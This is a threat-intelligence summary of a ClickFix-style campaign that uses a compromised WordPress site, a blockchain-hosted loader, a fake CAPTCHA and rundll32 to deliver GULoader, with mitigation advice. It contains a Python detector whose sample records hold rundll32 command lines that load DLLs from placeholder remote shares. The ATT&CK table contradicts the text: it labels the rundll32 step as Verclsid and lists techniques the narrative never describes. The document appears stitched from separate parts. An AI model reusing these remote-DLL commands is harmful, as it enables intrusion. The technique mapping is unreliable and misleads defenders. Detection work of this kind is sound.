EXECUTIVE SUMMARY
A loosely organized threat actor has compromised a European small‐business WordPress site and turned it into a delivery platform for a multi‐stage malware campaign. The operation combines a blockchain‐hosted payload, a fake CAPTCHA overlay, and a Windows LOLBin loader to achieve remote code execution. Targets are Windows desktop users who browse the site, with most victims located in corporate environments across Europe and North America. The attacker's primary objective is to establish a foothold that can be used for further payload delivery, data exfiltration, or ransom‐related activity.
The infection chain begins when the compromised WordPress site injects obfuscated JavaScript into every page load. The script contacts a BNB Smart Chain testnet node, retrieves a small loader, and then paints a fake reCAPTCHA prompt that copies a rundll32 command to the clipboard. A user who follows the on‐screen instructions triggers rundll32.exe with a UNC path, causing the system to stream a malicious DLL directly from a remote share into memory. The loaded module, identified as GULoader, establishes persistence, reaches out to a command‐and‐control server, and can download additional components for lateral movement and data theft.
The campaign is significant because it bypasses traditional reputation filters by using a legitimate website and a public blockchain, leaving no on‐disk artifact for signature scanners. Execution relies on a user‐initiated rundll32 call, which appears benign to most whitelisting solutions, making detection difficult until behavioral alerts fire. Organizations should harden web browsing by blocking outbound SMB and WebDAV traffic, disabling the WebClient service on workstations that do not require it, and monitoring for abnormal rundll32 arguments. Regular patching of content management systems, continuous integrity checks of server plugins, and user awareness training about unexpected CAPTCHA prompts further reduce risk.
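One defender‐side check for the rundll32 behaviour described above, written here as an added example (it is not code from this report or from the linked write‐ups): it scans constructed process‐creation records and flags rundll32 invocations whose module argument is a UNC path, distinguishing the WebDAV `host@port` notation from a plain share. The hosts, paths and PIDs are placeholders, not indicators from the campaign.

```python
"""Flag rundll32 invocations that load their DLL from a UNC share."""
import re

# Constructed process-creation records, shaped like the command_line field of
# a Sysmon Event ID 1 / Windows 4688 event. All values are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "command_line": r'rundll32.exe \\203.0.113.10@80\davwwwroot\lib.dll,Start'},
    {"pid": 4131, "parent": "explorer.exe",
     "command_line": r'"C:\Windows\System32\rundll32.exe" \\fileshare.example\public\x.dll,#1'},
    {"pid": 4150, "parent": "svchost.exe",
     "command_line": r'C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'},
    {"pid": 4162, "parent": "explorer.exe",
     "command_line": r'notepad.exe \\fileshare.example\public\readme.txt'},
]

# First token is the image (quoted or bare); the rest is the argument string.
IMAGE_RE = re.compile(r'\s*("([^"]+)"|(\S+))\s*(.*)')
# UNC prefix: two backslashes, a host (optionally host@port), a backslash.
UNC_RE = re.compile(r'^\\\\[^\\]+\\')


def classify(command_line):
    """Return a reason string when rundll32 loads its module over UNC, else None."""
    m = IMAGE_RE.match(command_line)
    if not m:
        return None
    image = (m.group(2) or m.group(3)).rsplit('\\', 1)[-1].lower()
    if image != 'rundll32.exe':
        return None
    args = m.group(4).strip()
    if not args:
        return None
    # rundll32 syntax is <module>,<export>; the module may itself be quoted.
    module = args.split(',', 1)[0].strip().strip('"')
    if not UNC_RE.match(module):
        return None
    host = module[2:].split('\\', 1)[0]
    # "host@80" / "host@SSL@443" is the WebClient (WebDAV) redirector notation;
    # a plain \\host\share may be served over SMB or fall back to WebDAV.
    transport = 'WebDAV' if '@' in host else 'SMB or WebDAV'
    return f'rundll32 loading module from remote share {host} via {transport}'


def scan(events):
    """Return (pid, reason) for every event that classify() flags."""
    hits = []
    for event in events:
        reason = classify(event["command_line"])
        if reason:
            hits.append((event["pid"], reason))
    return hits
```

Parent process is carried in the records because, in the chain described here, the flagged rundll32 descends from the user's shell (explorer.exe) after a clipboard paste rather than from an installer or service.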
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1189 | Drive-by Compromise | — |
| Defense Evasion | T1218.012 | System Binary Proxy Execution | Verclsid |
| Execution | T1204 | User Execution | — |
| Persistence | T1136.001 | Create Account | Local Account |
| Defense Evasion | T1027.006 | Obfuscated Files or Information | HTML Smuggling |
| Command and Control | T1105 | Ingress Tool Transfer | — |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/clickfix-campaign-uses-etherhiding-and-guloader/
https://blog.sicuranext.com/one-paste-to-rule-them-all-inside-a-clickfix-etherhiding-guloader-intrusion/